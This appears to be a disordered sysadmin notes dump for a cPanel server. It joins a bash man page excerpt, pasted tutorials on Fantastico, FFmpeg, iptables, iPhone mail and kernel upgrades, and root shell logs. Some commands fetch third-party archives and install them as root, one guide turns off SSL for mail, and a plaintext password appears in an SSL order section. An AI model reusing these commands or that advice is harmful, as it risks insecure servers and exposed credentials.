the echo builtin expands backslash-escape sequences by default. suspend [-f] Suspend the execution of this shell until it receives a SIGCONT signal. When the suspended shell is a background process, it can be restarted by the fg command. For more information, read the JOB CONTROL section. The suspend command can not suspend the login shell. However, when -f option is specified, suspend com- mand can suspend even login shell. The return status is 0 unless the shell is a login shell and -f is not supplied, or if job control is not enabled. test expr [ expr ] Return a status of 0 or 1 depending on the evaluation of the conditional expression expr. Each operator and operand must be a separate argument. Expressions are composed of the primaries described above under CONDITIONAL EXPRESSIONS. test does not accept any options, nor does it accept and ignore an argument of -- as signifying the end of options. Expressions may be combined using the following operators, listed in decreasing order of precedence. ! expr True if expr is false. ( expr ) Returns the value of expr. This may be used to override the normal precedence of operators. expr1 -a expr2 True if both expr1 and expr2 are true. expr1 -o expr2 True if either expr1 or expr2 is true. test and [ evaluate conditional expressions using a set of rules based on the number of arguments. 0 arguments The expression is false. 1 argument The expression is true if and only if the argument is not null. 2 arguments If the first argument is !, the expression is true if and only if the second argument is null. If the first argu- ment is one of the unary conditional operators listed above under CONDITIONAL EXPRESSIONS, the expression is true if the unary test is true. If the first argument is not a valid unary conditional operator, the expression is false. 3 arguments If the second argument is one of the binary conditional operators listed above under CONDITIONAL EXPRESSIONS, the result of the expression is the result of the binary test using the first and third arguments as operands. If the first argument is !, the value is the negation of the two-argument test using the second and third arguments. If the first argument is exactly ( and the third argument is exactly ), the result is the one-argument test of the second argument. Otherwise, the expression is false. The -a and -o operators are considered binary operators in this case. 4 arguments If the first argument is !, the result is the negation of the three-argument expression composed of the remaining arguments. Otherwise, the expression is parsed and eval- uated according to precedence using the rules listed above. 5 or more arguments The expression is parsed and evaluated according to precedence using the rules listed above. times Print the accumulated user and system times for the shell and for processes run from the shell. The return status is 0. trap [-lp] [[arg] sigspec ...] The command arg is to be read and executed when the shell receives signal(s) sigspec. If arg is absent (and there is a single sigspec) or -, each specified signal is reset to its original disposition (the value it had upon entrance to the shell). If arg is the null string the signal specified by each sigspec is ignored by the shell and by the commands it invokes. If arg is not present and -p has been supplied, then the trap commands associated with each sigspec are displayed. If no arguments are supplied or if only -p is given, trap prints the list of commands associated with each signal. The -l option causes the shell to print a list of signal names and their cor- responding numbers. Each sigspec is either a signal name defined in <signal.h>, or a signal number. Signal names are case insensitive and the SIG prefix is optional. If a sigspec is EXIT (0) the command arg is executed on exit from the shell. If a sigspec is DEBUG, the command arg is executed before every simple command, for command, case command, select command, every arithmetic for command, and before the first command executes in a shell function (see SHELL GRAMMAR above). Refer to the description of the extdebug option to the shopt builtin for details of its effect on the DEBUG trap. If a sigspec is ERR, the command arg is executed whenever a simple command has a non-zero exit status, subject to the following conditions. The ERR trap is not executed if the failed command is part of the command list immediately following a while or until keyword, part of the test in an if statement, part of a && or ââ list, or if the commandâs return value is being inverted via !. These are the same conditions obeyed by the errexit option. If a sigspec is RETURN, the command arg is executed each time a shell function or a script executed with the . or source builtins fin- ishes executing. Signals ignored upon entry to the shell cannot be trapped or reset. Trapped signals that are not being ignored are reset to their original values in a child process when it is created. The return status is false if any sigspec is invalid; otherwise trap returns true. type [-aftpP] name [name ...] With no options, indicate how each name would be interpreted if used as a command name. If the -t option is used, type prints a string which is one of alias, keyword, function, builtin, or file if name is an alias, shell reserved word, function, builtin, or disk file, respectively. If the name is not found, then nothing is printed, and an exit status of false is returned. If the -p option is used, type either returns the name of the disk file that would be executed if name were speci- fied as a command name, or nothing if ââtype -t nameââ would not return file. The -P option forces a PATH search for each name, even if ââtype -t nameââ would not return file. If a command is hashed, -p and -P print the hashed value, not necessarily the file that appears first in PATH. If the -a option is used, type prints all of the places that contain an executable named name. This includes aliases and functions, if and only if the -p option is not also used. The table of hashed commands is not consulted when using -a. The -f option suppresses shell func- tion lookup, as with the command builtin. type returns true if any of the arguments are found, false if none are found. ulimit [-SHacdefilmnpqrstuvx [limit]] Provides control over the resources available to the shell and to processes started by it, on systems that allow such control. The -H and -S options specify that the hard or soft limit is set for the given resource. A hard limit cannot be increased once it is set; a soft limit may be increased up to the value of the hard limit. If neither -H nor -S is specified, both the soft and hard limits are set. The value of limit can be a number in the unit specified for the resource or one of the special values hard, soft, or unlimited, which stand for the current hard limit, the current soft limit, and no limit, respectively. If limit is omitted, the current value of the soft limit of the resource is printed, unless the -H option is given. When more than one resource is specified, the limit name and unit are printed before the value. Other options are interpreted as fol- lows: -a All current limits are reported -c The maximum size of core files created -d The maximum size of a processâs data segment -e The maximum scheduling priority ("nice") -f The maximum size of files written by the shell and its children -i The maximum number of pending signals -l The maximum size that may be locked into memory -m The maximum resident set size (has no effect on Linux) -n The maximum number of open file descriptors (most systems do not allow this value to be set) -p The pipe size in 512-byte blocks (this may not be set) -q The maximum number of bytes in POSIX message queues -r The maximum real-time scheduling priority -s The maximum stack size -t The maximum amount of cpu time in seconds -u The maximum number of processes available to a single user -v The maximum amount of virtual memory available to the shell -x The maximum number of file locks If limit is given, it is the new value of the specified resource (the -a option is display only). If no option is given, then -f is assumed. Values are in 1024-byte increments, except for -t, which is in seconds, -p, which is in units of 512-byte blocks, and -n and -u, which are unscaled values. The return status is 0 unless an invalid option or argument is supplied, or an error occurs while setting a new limit. umask [-p] [-S] [mode] The user file-creation mask is set to mode. If mode begins with a digit, it is interpreted as an octal number; otherwise it is interpreted as a symbolic mode mask similar to that accepted by chmod(1). If mode is omitted, the current value of the mask is printed. The -S option causes the mask to be printed in sym- bolic form; the default output is an octal number. If the -p option is supplied, and mode is omitted, the output is in a form that may be reused as input. The return status is 0 if the mode was successfully changed or if no mode argument was supplied, and false otherwise. unalias [-a] [name ...] Remove each name from the list of defined aliases. If -a is supplied, all alias definitions are removed. The return value is true unless a supplied name is not a defined alias. unset [-fv] [name ...] For each name, remove the corresponding variable or function. If no options are supplied, or the -v option is given, each name refers to a shell variable. Read-only variables may not be unset. If -f is specified, each name refers to a shell func- tion, and the function definition is removed. Each unset vari- able or function is removed from the environment passed to sub- sequent commands. If any of RANDOM, SECONDS, LINENO, HISTCMD, FUNCNAME, GROUPS, or DIRSTACK are unset, they lose their special properties, even if they are subsequently reset. The exit sta- tus is true unless a name is readonly. wait [n ...] Wait for each specified process and return its termination sta- tus. Each n may be a process ID or a job specification; if a job spec is given, all processes in that jobâs pipeline are waited for. If n is not given, all currently active child pro- cesses are waited for, and the return status is zero. If n specifies a non-existent process or job, the return status is 127. Otherwise, the return status is the exit status of the last process or job waited for. SEE ALSO bash(1), sh(1) GNU Bash-3.0 2004 Apr 20 BASH_BUILTINS(1) root@click [/usr/local/apache/htdocs]# export HISTTIMEFORMAT='%F%T' #histry|moreDear Andrew, You can not forward .eml files from outlook cause we cannot save msoutlook email in .eml, but you could import Outlook's messages into Outlook Express and then save them as EML. You can follow the steps given below to import the rfc822 files that typically have a file extension of .eml or .msg Steps for import .eml files : Using Windows Explorer, open the folder containing the .eml or .msg files Open Outlook or Outlook Express Highlight the files in the windows folder Click and drag the files into Outlook That's it! You're done! cannot install fantastico : http://www.netenberg.com/forum/index.php?topic=5430.0 How to install Fantastico on cPanel/WHM Tutorial courtesy of netenberg.com You don't need to download any files in order to install Fantastico! Just SSH to your server and enter following commands (you may also copy/paste): cd /usr/local/cpanel/whostmgr/docroot/cgi wget -N http://files.betaservant.com/files/free/fantastico_whm_admin.tgz tar -xzpf fantastico_whm_admin.tgz rm -rf fantastico_whm_admin.tgz NOW GO TO YOUR WHM -> Add-Ons (Plugins on v11.x or higher) -> Fantastico De Luxe WHM Admin (scroll down the left menu). Follow the on screen instructions. If you get a Source Guardian error when you go to Fantastico for the first time, just run this command: chmod -R 0755 /usr/local/cpanel/3rdparty/etc/ixed After the installation is complete, click on "Settings" and go through the settings. While some settings are not important, some other (marked below with an *) are essential for a proper functioning of Fantastico installations. Language: Select the language for the admin backend AND default language for users without a language selected. Email notifications: Enter an email address in order to receive notifications when users perform installations using Fantastico. Master files settings (*): If you are not an advanced user who modifies the master files, leave this to "Remove". Change this only if you know what you are doing PHPsuexec (*): VERY ESSENTIAL!!! Changing this value will not install or de-install phpsuexec for you. It will only tell Fantastico that you have phpsuexec installed or not installed on your server. Change to "installed" if you perform installations which produce an "Internal Server Error". Notice: Changes will not apply to existing installations! You have to re-install in order to have working installations. Path to netPBM: Enter the full path to the netPBM binaries in order to enable Gallery installations. As long as this field has no value, your users will not be able to install Gallery. Select Fantastico licensing and files server: If the Fantastico pages take long to load switch to the server that works best for you. Fantastico will auto-switch if connections time out. Update preference: Select latest version (sometimes experimental) or stable version (best working). If your users don't see a Fantastico link in their CPanel: Go to WHM and edit the "default" Features List. Activate Fantastico. rpm -qa wget ; wget ftp://ftp.funet.fi/pub/mirrors/ftp.redhat.com/pub/fedora/linux/core/5/i386/os/Fedora/RPMS/wget-1.10.2-3.2.1.i386.rpm chattr -ia /usr/bin/wget rpm -e wget ; rpm -ivh --force wget-1.10.2-3.2.1.i386.rpm ; rpm -qa wget ;http://www.eukhost.com/forums/f15/how-install-ffmpeg-ffmpeg-php-mplayer-mencoder-flv2tool-lame-mp3-encoder-4893/ How To Install FFmpeg + FFmpeg-PHP + Mplayer + Mencoder + flv2tool + LAME MP3 Encoder Hello, Following are the steps to install FFmpeg + FFmpeg-PHP + Mplayer + Mencoder + flv2tool + LAME MP3 Encoder + Libog on a Linux server or VPS Hosting Manually. There are many automated scripts available which install these but its better to do it manually as in case of an error occuring during the installation process, we can stop the installation and fix them. These steps also include the common fixes for such errors. 1. cd /usr/local/src/ DOWNLOAD MODULES wget www3.mplayerhq.hu/MPlayer/releases/codecs/essential-20061022.tar.bz2 wget rubyforge.org/frs/download.php/9225/flvtool2_1.0.5_rc6.tgz wget easynews.dl.sourceforge.net/sourceforge/lame/lame-3.97.tar.gz wget superb-west.dl.sourceforge.net/sourceforge/ffmpeg-php/ffmpeg-php-0.5.1.tbz2 wget downloads.xiph.org/releases/ogg/libogg-1.1.3.tar.gz wget downloads.xiph.org/releases/vorbis/libvorbis-1.1.2.tar.gz 2. EXTRACT MODULES tar zxvf lame-3.97.tar.gz tar zxvf libogg-1.1.3.tar.gz tar zxvf libvorbis-1.1.2.tar.gz tar zxvf flvtool2_1.0.5_rc6.tgz tar jxvf essential-20061022.tar.bz2 tar jxvf ffmpeg-php-0.5.1.tbz2 mkdir /usr/local/lib/codecs/ yum install gcc gmake make libcpp libgcc libstdc++ gcc4 gcc4-c++ gcc4-gfortran subversion ruby ncurses-devel -y 3 DOWNLOAD FFMPEG and MPLAYER svn checkout svn://svn.mplayerhq.hu/ffmpeg/trunk ffmpeg svn checkout svn://svn.mplayerhq.hu/mplayer/trunk mplayer cd /usr/local/src/mplayer svn update cd /usr/local/src/ mv /usr/local/src/essential-20061022/* /usr/local/lib/codecs/ chmod -R 755 /usr/local/lib/codecs/ 4 LAME: cd /usr/local/src/lame-3.97 ./configure make && make install 5. LIBOGG cd /usr/local/src/ cd /usr/local/src/libogg-1.1.3 ./configure --enable-shared && make && make install PKG_CONFIG_PATH=/usr/local/lib/pkgconfig export PKG_CONFIG_PATH 6. LIBVORBIS cd /usr/local/src/ cd /usr/local/src/libvorbis-1.1.2 ./configure && make && make install 7. FLVTOOL2 cd /usr/local/src/ cd /usr/local/src/flvtool2_1.0.5_rc6/ ruby setup.rb config ruby setup.rb setup ruby setup.rb install 8. MPLAYER cd /usr/local/src/ cd /usr/local/src/mplayer ./configure && make && make install cd /usr/local/src/ 9. FFMPEG: cd /usr/local/src/ffmpeg/ ./configure --enable-libmp3lame --enable-libvorbis --disable-mmx --enable-shared make make install 10. export LD_LIBRARY_PATH=/usr/local/lib/ ln -s /usr/local/lib/libavformat.so.50 /usr/lib/libavformat.so.50 ln -s /usr/local/lib/libavcodec.so.51 /usr/lib/libavcodec.so.51 ln -s /usr/local/lib/libavutil.so.49 /usr/lib/libavutil.so.49 ln -s /usr/local/lib/libmp3lame.so.0 /usr/lib/libmp3lame.so.0 ln -s /usr/local/lib/libavformat.so.51 /usr/lib/libavformat.so.51 11. FFMPEG-PHP: cd /usr/local/src/ cd /usr/local/src/ffmpeg-php-0.5.1/ phpize ./configure make make install 12. NOTICE: Make sure this is the correct php.ini for the box!! echo 'extension=ffmpeg.so' >> /usr/local/Zend/etc/php.ini NOTICE: Make sure this is the correct php.ini for the box!! 13. RESTART APACHE service httpd restartuplaod software : kompozer like Filzilla How to Design and Publish Your Website with KompoZer Uploading or Publishing Your First Web Page To publish the page, go to "File | Publish" (ie, the "Publish" item on the "File" menu). A "Publish Page" dialog box will appear asking you for more details. "Site Name" is the name that you want to give your website. Use the name that you gave to your website when asked for the title earlier (ie, "Shakespeare's Website" or "XYZ Company" or whatever). This name is only used by KompoZer internally, to refer to your site, but it's probably best to use the real name you ultimately wish to give to your site to minimize any confusion later. The "HTTP address of your homepage" field specifies the actual web address (or URL) of your website. If you registered a domain name like "example.com" for your site, enter "http://www.example.com/" into this box. This field is required because KompoZer will use this information to form links on your site. Be sure to enter the "http://" prefix as well. "Publishing server" is a bit more complicated to explain. When you signed up for your web hosting account from a commercial web host, you would have been given a whole bunch of details by your web host. Among these is something known as your "FTP address". FTP, or File Transfer Protocol, is the usual means by which you transfer your web pages from your own computer to your web host's computer. Transferring your pages from your computer to your web host's computer is known as "publishing" or "uploading" your pages. For the purpose of this tutorial, I will assume that your web host told you that your FTP address is "ftp.example.com". You should substitute your real FTP address everytime you see "ftp.example.com" in the examples below. Before you enter that address though, you will need to know which directory (or folder) you need to put your web pages. Some web hosts require you to put your web pages in a directory named "www". Others require you to put it in a "public_html" directory. Still others say that you are to put your web pages into the default directory that you see when you connect by FTP. And so on. Find out the directory where you're supposed to upload your web pages to. Once you've got all the details, you're ready to form the address you have to enter into the "Publishing address" field. If your FTP address is "ftp.example.com", and the directory that you're supposed to upload to is "www", enter "ftp://ftp.example.com/www" here. Notice that you have prefixed "ftp://" to your FTP address ("ftp.example.com"), added a slash ("/") and followed it with your web directory name ("www"). If your web host tells you to simply upload it to the directory you are logged into when you connect by FTP, then just enter "ftp://ftp.example.com" here. The "User name" and "Password" fields in the dialog box refers to user name (or login name) and password that your web host assigned to you. It is needed so that KompoZer can connect to your FTP account and upload (publish) your pages. When you've finished completing the information, click the "Publish" button. KompoZer will proceed to connect to your FTP account on your web host and upload your pages. There will be a dialog box that pops up to tell you it is uploading your page. The box will automatically disappear when KompoZer has completed its task. If you get an error message from KompoZer, look through the guide above again and recheck all your settings. Most of the problems at this stage are caused by one of the settings not being correctly entered. If you have eliminated all possible errors in your settings and still get an "Unknown publishing error", check my FAQ on this. Testing the Web Page Before you proceed further, you need to test the web page you have uploaded. This way, you will know whether you've made any mistake when entering your details earlier. Start up your browser. Type the URL (web address) of your website. This is the address that you typed into the "HTTP address" field earlier. For example, type "http://www.example.com" if that is your URL. If you've entered the "publishing server" earlier correctly, you should see the page you created earlier in your web browser. If you get an error like "No DNS for www.example.com" or "Domain not found", it probably means that your domain name has not yet propagated to your ISP. Put simply, this means that you probably only just bought your domain name. It takes time for a new domain name to be recognized across the world (usually 2 or more days), so it's possible that your ISP has not yet updated its name servers to recognize your new domain. Some web hosts give you a temporary address which you can use to access your website in meantime. If you have that, use the temporary address to check that your site has been uploaded properly. Otherwise, you'll just have to wait. If you get an error like "404 File Not Found" or you get your web host's preinstalled default page, you may need to go back and check your "publishing server" field. You may have published your page to a location that is not recognized by the web server as the default page to show when only your domain name is entered. You can change the settings that you have just entered by accessing the "Edit | Publishing Site Settings" menu. Then click the name of your website in the left pane, under "Publishing sites". One possibility for the page not showing is that you did not specify the correct directory on your web site to publish your index.html page to. A more remote possibility is that your web host requires that your page be named something other than "index.html". This is very rare nowadays, so explore this last possibility only when you've ruled out all others. At worse, ask your web host's support department or check their documentation for help. If what you see is your domain parking page created by default when you first bought your domain name, it may mean that you forgot to point your domain name to your web hosting account. I strongly recommend that you go back and follow the steps given the How to Start / Make a Website in addition to following this tutorial. As mentioned before, there's more to creating a website than just using a web editor. If you get no errors at all, but see the page that you've designed earlier, congratulations! You've created and uploaded your first web page. It may be a rudimentary page but you have successfully walked through all the essential stages of designing and uploading a web page./usr/local/cpanel/bin/apache_conf_distiller --update/scripts/rebuildhttpdconf Will recreate httpd.conf https only AND www only RewriteEngine On RewriteCond %{HTTPS} off RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} #RewriteCond %{HTTP_HOST} ^webhelpingaids\.com #RewriteRule ^(.*)$ http://www.webhelpingaids.com/$1 [R=permanent,L] Options +FollowSymLinks RewriteEngine on RewriteCond %{HTTP_HOST} ^digitalhothouse.co.nz [NC] RewriteCond %{HTTP_HOST} ^www.digitalhothouse.co.nz [NC] RewriteRule ^(.*)$ https://www.digitalhothouse.co.nz/ [L,R=301] Hot to check ImageMagic ? which convert if its not installed on the server : you can run the following command : yum install ImageMagic How to install ImageMagick on linux? Here are the steps that I have followed : ============ 1.Check whether ImageMagick has been installed or not. which convert or which montage like this or locate ImageMagick. Or rpm -qa |grep ImageMagic 2. yum install ImageMagick 3. Now check once again. 4. rpm -ql ImageMagic| more 5. rpm -qf /usr/local/bin/convert //to check the exact rpm which has used for this binary. ============ That's it. Try now :) cd /var/www/html/ or /usr/local/apache/htdocs pico serverstats_inc.php <?php echo exec(uptime); ?> chmod 755 serverstats_inc.php ADMIN PROCEDURE - Order SSL Certificate Login to the server and generate the CSR / Key, use the following details.. Cert Info (this will be displayed when a user connects) Host to make cert for domain (normally with www) or servername Country (2 letter Abbrivation) US State Texas City Humble Company Name ghostcare Company Division Networks Email sw@minmaxgroup.com Password jjdd93jfd ********************************************************* New Details : Hostname: chief.site.com Company: MinMax Group LLC Division: Networks Country: US State: NY City: Long Island City Email: sw@minmaxgroup.com cd /usr/local wget http://downloads.ioncube.com/loader_downloads/ioncube_loaders_lin_x86.tar.gz tar -zxvf gz-file-which-was-wgetted cd ioncubeadd in php.ini zend_extension="/home/juicydea/public_html/ioncube_loader_lin_5.2.so"block ip if there are 10 hits within a minute from same ip. iptables -I INPUT -p tcp --dport 80 -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 10 -j DROPHello, Please try to reconfigure the email account with the following configuration settings for the iPhone : 1. First activate the phone screen, and then click on 'Settings'… 2. next is to click on the iPhone Mail . 3. Now to setup a new account click on 'Add Account'. 4. Since Apple there are several preconfigured options in iPone like 'Google, 'Yahoo', 'Mac' and 'AOL', but probably you need to setup different mail since you are reading this iPhone tutorial. To setup a different account tap on 'Other' 5. In this 'Other' section in your iPhone, choose POP, then fill the credentials for the mail account. 6. set the Incoming mail : pop.domain.com Outgoing mail : smtp.domain.com 7. When you are ready, double check the settings with the service provider and click 'Save' at the top right corner of the iPhone screen. 8. This will put you back into the Mail section, but this time you will have the new account available at the top. 9. Congratulations you have setup your mail. Now go to your main iPhone screen and click on 'Mail' icon. 10. Then choose the iPhone account you just setup. 11. There choose the iPhone inbox to see the downloaded messages. 12. and set 'ON' the SSL for iPhone 'Outgoing mail server' and will change the server port to be 465. 13. Save the changes and then go back to the main iPhone and check your mails. For info you can refer the URL : http://www.onlinehowto.net/Tutorials/iPhone/Setup-iPhone-mail-account-settings/1116 Please check and confirm the same at your end. How To - Configuring an IMAP connection for your iPhone Applies to: SmarterMail all version This article will help you create a SmarterMail IMAP connection to an iPhone or iPhone 3G with Firmware 2.0.x. 1. On the iPhone, click the Settings button 2. Click Mail, Contacts, Calendars button 3.Click the Add Account button 4. Click Other 5. Fill out the Name, Address (email address), Password and Description Fields 6. Click Save 7. Make sure IMAP is selected 8. Enter your Incoming Mail Server information * Hostname is generally mail.yourdomainname.com. If you aren't sure, contact your email hosting company * Username is your full email address * Password is the same password used to access webmail. 9. Enter your Outgoing Mail Server information * Hostname is generally mail.yourdomainname.com. If you aren't sure, contact your email hosting company * Username is your full email address * Password is the same password used to access webmail. 10. Click Save 11. The iPhone will attempt to establish an SSL connection to your IMAP and SMTP servers. 12. If this fails, you will see a prompt "Do you want to try setting up the account without SSL." * Click No. * Click Save * When prompted "This account may not be able to send or receive emails. Are you sure you want to save?", select Save. 13. Click the account you just added (identified by your email address) 14. Scroll down and click the SMTP button. 15. Select the server you just added, identified by the hostname from step 9a. 16. Select "OFF" for Use SSL. 17. Select "Password" for Authentication 18. Select "25" for Server Port. 19. Click the SMTP button to go back 20. Click your email address to go back 21. Click Advanced 22. Scroll down to Incoming Settings. 23. Select "OFF" for Use SSL 24. Select "Password" for Authentication 25. Select "143" for Server Port 26. Click your email address to go back 27. Click Mail to go back 28. Hit the Home button 29. Hit the Mail App to check your configuration **************************************************************************************************************** https://docs.rice.edu/confluence/display/ITTUT/iPhone+Email+Configuration+(First+Time+Setup) iPhone Email Setup This guide is for users who are NOT using Mac Mail or Microsoft Outlook, since iTunes can sync your settings from these programs directly to the iPhone. On the Home screen, click "Settings", Select "Mail", "Add Account...", "Other" IMAP Fill in the first 3 fields with your name (this will appear in the "From" field of messages you send); the email address you send mail from (this can be your NetID or your full-name email address, whichever you want to be known as) and a label for what you want your account to be called on your iPhone (this won't affect your mail account in any way, it is just a label). For the "Incoming Mail Server" section: Under "Host Name" write imap.mail.rice.edu Under "User Name", write your Rice NetID Input your NetID password in the field provided For the "Outgoing Mail Server" section: Under "Host Name", write: smtp.mail.rice.edu Under "User Name", write your Rice NetID Input your NetID password in the field provided Click "Save". It may give you an error message, but your settings should still work.Click "Advanced" and ensure that SSL is "ON" in both sections iptables -A INPUT -s IP -j ACCEPT iptables -nL | grep IP service iptables save iptables -L -n |grep 115.248.197.138 to check whether the IP is blocked.dc IP adding Hello, We have added your IP in whitelist of our server firewall and add the iptables rule also. The commands we executed on the shell are as follows. Please check and let us know if we need to do something else also. iptables -A INPUT -s 72.29.79.51 -j ACCEPT ; /sbin/service iptables save csf -a 72.29.79.51 Regards, Udele root@oyster [~]# route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 67.23.226.130 0.0.0.0 255.255.255.255 UH 0 0 0 eth0 76.102.169.186 - 255.255.255.255 !H 0 - 0 - 67.23.226.131 0.0.0.0 255.255.255.255 UH 0 0 0 eth0 67.23.226.134 0.0.0.0 255.255.255.255 UH 0 0 0 eth0 67.23.226.135 0.0.0.0 255.255.255.255 UH 0 0 0 eth0 67.23.226.132 0.0.0.0 255.255.255.255 UH 0 0 0 eth0 67.23.226.133 0.0.0.0 255.255.255.255 UH 0 0 0 eth0 72.29.95.172 - 255.255.255.255 !H 0 - 0 - 67.23.226.138 0.0.0.0 255.255.255.255 UH 0 0 0 eth0 67.23.226.136 0.0.0.0 255.255.255.255 UH 0 0 0 eth0 67.23.226.137 0.0.0.0 255.255.255.255 UH 0 0 0 eth0 67.23.226.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0 0.0.0.0 67.23.226.1 0.0.0.0 UG 0 0 0 eth0 root@oyster [~]# ip route del 72.29.95.172 root@oyster [~]# ip route del 76.102.169.186 root@oyster [~]# iptables -nL | grep 76.102.169.186 root@oyster [~]# iptables -nL | grep 72.29.95.172 all -- 72.29.95.172 0.0.0.0/0 DROP all -- 72.29.95.172 0.0.0.0/0 ACCEPT all -- 72.29.95.172 0.0.0.0/0 ACCEPT all -- 0.0.0.0/0 72.29.95.172 root@oyster [~]# csf -a 72.29.95.172 add failed: 72.29.95.172 is in already in the allow file /etc/csf/csf.allow root@oyster [~]# vim /etc/sysconfig/iptables root@oyster [~]# /etc/init.d/iptables save Saving firewall rules to /etc/sysconfig/iptables: [ OK ] root@oyster [~]# /etc/init.d/iptables restart Flushing firewall rules: [ OK ] Setting chains to policy ACCEPT: mangle filter [ OK ] Unloading iptables modules: [ OK ] Applying iptables firewall rules: When the server is able to WHM but not able to ssh and ssh restart failed, then from WHM >> ConfigServer Security & Firewall >> disable firewall >> then try to ssh and run following commands root@fast [~]# iptables -A INPUT -s 124.124.124.118 -j ACCEPT root@fast [~]# iptables -A OUTPUT -s 124.124.124.118 -j ACCEPT Once ip gets added , save the iptables with the commands below : /etc/init.d/iptables save to list added IP's run the command >> iptables -L now from shell csf -e this will enables the firewall or from WHM run >> firewall enable. ************************************************************************ bellow command will descripbe all the options with the iptables man iptables how to save iptables /etc/init.d/iptables save /etc/init.d/iptables save /etc/init.d/iptables stop Flushing firewall rules: [ OK ] Setting chains to policy ACCEPT: filter [ OK ] Unloading iptables modules: [ OK ] /etc/sysconfig/iptables: this is the path for iptables *************************************************************************************** http://www.linuxforums.org/forum/linux-security/25051-how-save-iptables.htmlYou are on a an ISP that blocks their users from using any SMTP server other than their own. Your solution is as follows: 1. To setup your ISP's SMTP servers for your outgoing email, you must click on your account settings in the email client you are using. 2. In the SMTP (outgoing mail server) field, you will enter the SMTP server address for your ISP, such as smtp.yourisp.com. You must then enter the username and password for your ISPs mail server. For a list of ISPs and their SMTP server address, please click here. 3. In Outlook Express, this is at the bottom of that same tab. You must uncheck My server requires authentication and click on Settings to enter the username and password for your ISP. Your email will still be from your own domain name, the only difference is in the way it is routed throughout the internet. Instead of being sent through our servers, it is processed through your ISP. This allows your ISP to monitor your email in case of a spam complaint.Joomla passwprd reset script http://www.crushedge.com/content/scripts/joomla-administrator-password-reset-script Virtumart error from joomla for mails: "Warning: Could not send a message to" when notify after changing order status My problem is that I receive the following error message if I want to notify customers when I change their order status : Warning: Could not send a message to username, name@emaill.com () Cehck the URL : http://forum.virtuemart.net/index.php?topic=34555.msg118383 Problem : I'm using Joomla 1.0.13 with VirtueMart 1.0.13a My Joomla mail system is setup with smtp and is working fine (I can send successfully massmailing through the joomla admin) What can I do to solve that problem ? The solution has maybe even been explained but I can't find the topic... Many thanks for your help, this problem is blocking for me. Solution : The SOLUTION is to Change the Mail Format from HTML to TEXT, there's probably a bug in the HTML email variant of the code... To make the Change, log into the back-end..means into joomla admin area Choose Virtuemart. Next Click on Admin / Configuration Scroll to the bottom of the Global Tab. Change Order-mail format: to Text Mail Test by changing status and notifying a customer order.. Be Sure the Global MAil configuration is set to phpMail() How to Change Global MAil configuration to phpMail() Go to Home >> Global confoguration >> mail >> set mailer to PHP mail functionBroadcast message from root (Tue Sep 21 23:31:26 2010): SERVER is REBOOTED as KERNEL is UPGRADED Broadcast message from root (Tue Sep 21 23:31:26 2010): SERVER is REBOOTED as KERNEL is UPGRADED Broadcast message from root (Tue Sep 21 23:31:26 2010): The system is going down for reboot NOW! Using username "3gteam". 3gteam@chief.site.com's password: Last login: Wed Sep 22 01:04:00 2010 from 115.248.197.138 cpanel backups are pushing to the new /backup drive attached to this server. DO NOT INTERRUPT THE BACKUP PROCESS. -- HD NOC, 8/11/10 3gteam@chief [~]# su - Password: root@chief [~]# pico ~3gteam/kscript root@chief [~]# pico /var/spool/cron/root root@chief [~]# 0 0 1 * * /home/3gteam/kscript > /dev/null 2>&1 root@chief [~]# /etc/init.d/crond restart Stopping crond: [ OK ] Starting crond: [ OK ] root@chief [~]# uname -r 2.6.18-194.11.4.el5 root@chief [~]# uname -m SERVER is REBOOTED as KERNEL is UPGRADED Broadcast message from root (pts/1) (Wed Sep 22 04:20:36 2010): SERVER is REBOOTED as KERNEL is UPGRADED Broadcast message from root (pts/1) (Wed Sep 22 04:20:36 2010): SERVER is REBOOTED as KERNEL is UPGRADED Broadcast message from root (pts/1) (Wed Sep 22 04:20:36 2010): SERVER is REBOOTED as KERNEL is UPGRADED Broadcast message from root (pts/1) (Wed Sep 22 04:20:36 2010): The system is going down for reboot NOW! Using username "3gteam". 3gteam@excel.nseasy.com's password: Last login: Wed Sep 22 04:24:16 2010 from 115.248.197.138 3gteam@excel [~]# su - Password: root@excel [~]# uname -r 2.6.18-194.11.4.el5 root@excel [~]# uname -m i686 root@excel [~]# i686 root@chief [~]# pico ~3gteam/kscript root@chief [~]# How to upgrade kernel on linux? Guys, I referred the following steps : ============================ 1. cd /usr/local/src 2. wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-x.y.z.tar.bz2 //replace the version that you want to install or check it at http://www.kernel.org/ 3. tar -xjvf linux-2.6.35.4.tar.bz2 -C /usr/src 4. cd /usr/src/linux-2.6.35.4 5. make menuconfig //if gcc is not there just install it like : yum install gcc Note : You can enable various option here. But make it sure that you have enabled kernel config option. Go to General option >> Kernel .config support(enter space) and exit. (save the changes). make oldconfig > Use when upgrading kernel, only asks if new options. 6. make 7. make modules 8. make modules_install Note(Do the following) : # ln -s /usr/src/linux-2.6.35.4 /usr/src/linux # ln -s /usr/src/linux-2.6.35.4 /usr/src/linux-2.6 9. make install Note : It will install three files inside the /boot directory : * System.map-2.6.35.4 * config-2.6.35.4 * vmlinuz-2.6.35.4 and vmlinuz will point here. example(For my case): ---------- root@server [/usr/src/linux-2.6.35.4]# make install sh /usr/src/linux-2.6.35.4/arch/x86/boot/install.sh 2.6.35.4 arch/x86/boot/bzImage \ System.map "/boot" root@server [/usr/src/linux-2.6.35.4]# root@server [/boot]# ll |grep 2.6.35.4 -rw------- 1 root root 2586318 Sep 3 18:00 initrd-2.6.35.4.img lrwxrwxrwx 1 root root 25 Sep 3 18:00 System.map -> /boot/System.map-2.6.35.4 -rw-r--r-- 1 root root 1360605 Sep 3 18:00 System.map-2.6.35.4 lrwxrwxrwx 1 root root 22 Sep 3 18:00 vmlinuz -> /boot/vmlinuz-2.6.35.4 -rw-r--r-- 1 root root 2653408 Sep 3 18:00 vmlinuz-2.6.35.4 root@server [/boot] Make sure System.map and vmlinuz are pointing to latest kernel else point them like : ln -s /boot/System.map-2.6.28 /boot/System.map ln -s /boot/vmlinuz-2.6.35.4 /boot/vmlinuz ----------- 10. cd /boot 11. mkinitrd initrd.img-2.6.35.4 2.6.35.4 //You may not be needed this step. For me it has automatically created. This is creation of RAM driver. Example for my case : ------------ root@server [/boot]# mkinitrd initrd-2.6.35.4.img 2.6.35.4 